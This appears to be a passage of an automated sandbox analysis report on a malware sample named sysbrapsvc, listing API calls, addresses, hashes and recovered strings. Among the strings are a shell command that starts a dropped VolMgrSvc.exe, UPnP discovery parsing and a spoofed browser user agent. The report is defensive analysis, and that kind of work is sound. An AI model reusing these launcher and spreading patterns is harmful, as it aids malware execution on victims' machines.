                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 3862671961-0
                                                                                • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction ID: 6fb5641eb3e61aabfeb8d94b6f23565c140e371fca94fd76c4ad34d85bd1d77f
                                                                                • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction Fuzzy Hash: 32414C75E00209EBCB04EFE4D848BAEBB71EF44305F10C16AE916A7384D6789A85CF55
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040EE3E
                                                                                • memset.NTDLL ref: 0040EE4E
                                                                                • CreateProcessW.KERNEL32(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EE87
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EE97
                                                                                • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EEB2
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EECC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction ID: ab95b539b52ee8c861e7b35bb7843e11e17158efae48c82db73052011d4181fd
                                                                                • Opcode Fuzzy Hash: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction Fuzzy Hash: F2113071A4430CBAEB10DB90DD46FDE7764AB14B00F104125FA057E2C0D6F5AA548759
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                • setsockopt.WS2_32 ref: 00401F2C
                                                                                • closesocket.WS2_32(?), ref: 00401F39
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 671207744-0
                                                                                • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction ID: 68686fb6eff55c499ad5be399ae1fa7ea08460e57826cc3027d59358e60976cc
                                                                                • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction Fuzzy Hash: 34519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                                                                APIs
                                                                                • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040DD9E
                                                                                • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                • StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleeprecvfrom
                                                                                • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                • API String ID: 668330359-3973262388
                                                                                • Opcode ID: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction ID: 7b96b2f8d6d36e055c6c7570a615b3eea8bd5cb55d36e980e60cabbeadb8daeb
                                                                                • Opcode Fuzzy Hash: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction Fuzzy Hash: 78216FB5940218ABDB20DB64DC49BE97774AF04308F1085E9E709BB2D0D6B95AC6CF9C
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EEF7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EF16
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EF3F
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF68
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF72
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EF7D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EEF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-2272513262
                                                                                • Opcode ID: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction ID: 09246262baac8142bf73057cdf9805b9640511cbdee0a0d8a20d2e1b7007a2ac
                                                                                • Opcode Fuzzy Hash: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction Fuzzy Hash: 6A210A75A40309FBDB10DFA4CC49FEEB775AB08705F1085A9FA11AB2C0C7B96A44CB59
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041AE68,?,?,?,?,?,?,00407EF9), ref: 0040B77B
                                                                                • CreateFileW.KERNEL32(0041AC50,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B7CD
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B7EE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B80D
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B822
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B888
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B892
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B89C
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                • String ID:
                                                                                • API String ID: 439099756-0
                                                                                • Opcode ID: c6295368b3329a36b4d5b539f0c7913c2e24e4bff1a22c952df061e282144c4a
                                                                                • Instruction ID: 479a2d3db74d12cc9ab5db8b9028aebaa0e2ca82416c5c7c2c0831f1d1863687
                                                                                • Opcode Fuzzy Hash: c6295368b3329a36b4d5b539f0c7913c2e24e4bff1a22c952df061e282144c4a
                                                                                • Instruction Fuzzy Hash: FB417C75E40309ABDB10EFA4CC4ABAEB774EB44704F20842AFA11B72D1C7B96541CB9D
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041A400,?,?,?,?,?,00407EC3), ref: 00405B6B
                                                                                • CreateFileW.KERNEL32(0041A630,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407EC3), ref: 00405B85
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                • String ID:
                                                                                • API String ID: 3956458805-0
                                                                                • Opcode ID: 284b283459330de0b1143f1684a29cd07a22339025804f57593563af66457d89
                                                                                • Instruction ID: 34cf97d68150feb52ab64e4c1d62c08212747bf40ca63f75f299d91bb9f0c47d
                                                                                • Opcode Fuzzy Hash: 284b283459330de0b1143f1684a29cd07a22339025804f57593563af66457d89
                                                                                • Instruction Fuzzy Hash: 5D313A74A40308EBEB10DBA4CD4ABAFB770EB44704F208529E601772D0D7B96A81CF99
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,00000000,0040BDA2,006A0266,?,0040BDBE,00000000,0040D09C,?), ref: 0040600F
                                                                                • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                                                                • CreateFileW.KERNEL32(0041A630,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                                                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                                                                • LeaveCriticalSection.KERNEL32(0041A400,?,?,?,?,?,?,0040BDBE,00000000,0040D09C,?), ref: 00406248
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                • String ID:
                                                                                • API String ID: 1457358591-0
                                                                                • Opcode ID: 7d39a30a029986bca7bb4f0c5866fafd33a6f5de3b8d974b21aec683df7cdf74
                                                                                • Instruction ID: 2241f90cca7a27a2546e95c76b2552fd8efe4d50fa40d22b7b041634b3385480
                                                                                • Opcode Fuzzy Hash: 7d39a30a029986bca7bb4f0c5866fafd33a6f5de3b8d974b21aec683df7cdf74
                                                                                • Instruction Fuzzy Hash: 4271CFB4E002099BCB04CF94D985FEFB7B1AB48304F14857DE505BB382D779A951CBA6
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction ID: 7a529818069a58d4d2ae4584624926d6a8b7ee91a4ee1179ae14f9cec19009dd
                                                                                • Opcode Fuzzy Hash: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction Fuzzy Hash: FC412AB5A0020ADFCB04DF99C884BAFB7B9FF48304F108569E515A7390D778AE85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction ID: 0dd75c4ae2219cb0414d4c222623d171442623ab9389109279868d9d6e555a3a
                                                                                • Opcode Fuzzy Hash: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction Fuzzy Hash: FA413C74A0020ADFCB04CF99D884BAFB7B5BF58304F508969E505A7390D779EA91CF94
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: f3ad203a95010958b8c1f3f107c3da268ef795d58a7c48103c0b3f0c6d45af56
                                                                                • Instruction ID: 37460acbf0a505b6a9388cec97320328f7083b01a8d1f88c89259c7d7d106706
                                                                                • Opcode Fuzzy Hash: f3ad203a95010958b8c1f3f107c3da268ef795d58a7c48103c0b3f0c6d45af56
                                                                                • Instruction Fuzzy Hash: A031E172200315ABC710AFB5ED8CAD7B7A8FF44324F04463EF58AD3280DB79A4449B99
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                                • CoCreateInstance.OLE32(00412920,00000000,00000001,00412900,?), ref: 00406423
                                                                                • wsprintfW.USER32 ref: 00406456
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstancewsprintf
                                                                                • String ID: %comspec%$/c start %s & start %s\VolMgrSvc.exe$Gh@
                                                                                • API String ID: 2038452267-1176807594
                                                                                • Opcode ID: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction ID: 2c6fb4a3d0a1bb960828f31a0de6db084021911c18f79e55e776afc792a10ffb
                                                                                • Opcode Fuzzy Hash: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction Fuzzy Hash: 1931C975A40208EFCB04DF98D885FDEB7B5EF88704F208199E519A73A5CB74AE81CB54
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction ID: 0e4cd8c02c4e5e279ec4fd0352b83bc081febda0d06dc7f405a75fcd32bf7d71
                                                                                • Opcode Fuzzy Hash: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction Fuzzy Hash: AF3109B1E0020ADFCB04DF99D884BAFB7B5EF88304F108569E514A7390D778AA85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction ID: dde9dd1fd58b67a95de0ca68c0f21478634a56bbec0f0045ca3d2b9f6da46dfd
                                                                                • Opcode Fuzzy Hash: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction Fuzzy Hash: 4F312D70A0010ADFCB04CF96D884BEFB7B5BF58304F508969E515A7390D7799991CF94
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                • String ID: %s%s
                                                                                • API String ID: 1447977647-3252725368
                                                                                • Opcode ID: b1bb112d4c90ed658366957cc38dd4aa79e2f5495822f89f5b4a7354217b67c4
                                                                                • Instruction ID: 9050299abbe0a346d3081233791c3133021d614aeebffb5e53434d9287984c88
                                                                                • Opcode Fuzzy Hash: b1bb112d4c90ed658366957cc38dd4aa79e2f5495822f89f5b4a7354217b67c4
                                                                                • Instruction Fuzzy Hash: 30310DB4C00218DFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF5A
                                                                                APIs
                                                                                • GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                                                                • NoDrives, xrefs: 004063B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                • API String ID: 2666887985-3471754645
                                                                                • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                                                                • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D700: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D740
                                                                                  • Part of subcall function 0040D700: CloseHandle.KERNEL32(?), ref: 0040D759
                                                                                • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2251373460-0
                                                                                • Opcode ID: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction ID: f472e5e68ab63b0dd33345cd9092821366bebf82f5afbdb011aebb5a24a45ce9
